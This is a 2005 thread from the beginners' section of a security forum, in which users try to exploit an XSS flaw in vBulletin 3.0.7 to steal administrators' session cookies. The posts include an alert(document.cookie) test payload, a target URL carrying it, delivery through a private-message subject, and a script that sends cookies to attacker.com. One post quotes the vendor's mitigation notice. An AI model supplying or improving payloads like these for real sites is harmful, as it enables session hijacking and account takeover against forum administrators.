Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 182
Members: 0
Total: 182
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> vbulletin 3.0.7
Post new topicReply to topic View previous topic :: View next topic
vbulletin 3.0.7
PostPosted: Tue Jul 26, 2005 9:58 pm Reply with quote
outlawsys
Regular user
Regular user
Joined: Jun 11, 2005
Posts: 12




is there a security hole or bug in vbulletin 3.0.7?
View user's profile Send private message
PostPosted: Thu Jul 28, 2005 11:40 pm Reply with quote
diegocure15
Active user
Active user
Joined: Sep 22, 2004
Posts: 27




yes i like to know that too!!! someone????
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 9:16 am Reply with quote
outlawsys
Regular user
Regular user
Joined: Jun 11, 2005
Posts: 12




i search the internet and i found a XSS in vBulletin 3.0.7.There is a bug in private.php
i try this code
<script>javascript:alert(document.cookie);</Script>
and i see my cookie informations.
Now how can i use this codes to take admin's cookie informations?
if someone can give me answer, i will be very pleased thankz a lot
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 5:36 pm Reply with quote
diegocure15
Active user
Active user
Joined: Sep 22, 2004
Posts: 27




outlawsys wrote:
i search the internet and i found a XSS in vBulletin 3.0.7.There is a bug in private.php
i try this code
<script>javascript:alert(document.cookie);</Script>
and i see my cookie informations.
Now how can i use this codes to take admin's cookie informations?
if someone can give me answer, i will be very pleased thankz a lot



How did you do that? http://www.webvictim.com/private.php?do=<script>javascript:alert(document.cookie);</Script> Question Question Question
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 7:49 pm Reply with quote
outlawsys
Regular user
Regular user
Joined: Jun 11, 2005
Posts: 12




you enter the private message and sent a private message someone and enter the code to SUBJECT. and the preview message
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 8:54 pm Reply with quote
diegocure15
Active user
Active user
Joined: Sep 22, 2004
Posts: 27




thanks now we have to find a way that the admins can see that and pull their cookies off it.

i tried this... but too long to fit into subject box


<script>document.write("<img src=http://attacker.com/? + document.cookie + ?>?)</script>
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 11:36 pm Reply with quote
Matt
Regular user
Regular user
Joined: Jul 30, 2005
Posts: 7




thats not what you need to do at all.
take a look at a similar exploit for ipb and phpbb using bbcode.

but i did find this on a vbulliten support site:
Quote:
An XSS issue exists within vBulletin 3 in versions up to and including 3.0.7.

Fortunately, the circumstances that allow this XSS issue to be exploited are quite rare so the majority of installations dont have to worry.

Your installation is only vulnerable if:

* You do not Allow Wild Card Searchs or
* You have a very large Search Index Minimum Word Length value (more than ten characters)

If these conditions apply to your board, you can easily secure your installation against XSS exploitation by turning on search wild cards and setting a smaller (6 or less) value for Search Index Minimum Word Length.

Both of these settings can be found in vBulletin Options > Message Searching Options (Default Search)

If you are unable to change these settings, you can simply overwrite the existing includes/functions_search.php file with the one attached to this thread. If neither of the above listed settings apply to your vBulletin Forum, there is no need to download this file at all.

If you need it, you can get the file here: http://www.vbulletin.com/forum/showthread.php?t=133459


there ya go, they admited themself they left a bug in it.
apparently its not big enough to allow a new version to be released, but still can cause some damage.
ive tried to look into this, but i couldnt find anything, than again my hacking skills arnt good at all.
View user's profile Send private message MSN Messenger
PostPosted: Wed Aug 03, 2005 10:54 am Reply with quote
outlawsys
Regular user
Regular user
Joined: Jun 11, 2005
Posts: 12




is there anyone know about something about vbulettin XSS.if someone helps us we will b very pleased
View user's profile Send private message
PostPosted: Wed Aug 03, 2005 10:20 pm Reply with quote
diegocure15
Active user
Active user
Joined: Sep 22, 2004
Posts: 27




well i found this.... http://lnx.hackerscenter.com/Forums/index.php?showtopic=1422&st=0 but its bit difficult to understand but at least they are working on it read all post on that topic and come back here and tell me if you got something else and what did you undertood.

seeya
View user's profile Send private message
PostPosted: Fri Aug 05, 2005 2:23 am Reply with quote
Matt
Regular user
Regular user
Joined: Jul 30, 2005
Posts: 7




yeah i saw that already, i posted. i dont see how that can work though.
View user's profile Send private message MSN Messenger
vbulletin 3.0.7
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.035 Seconds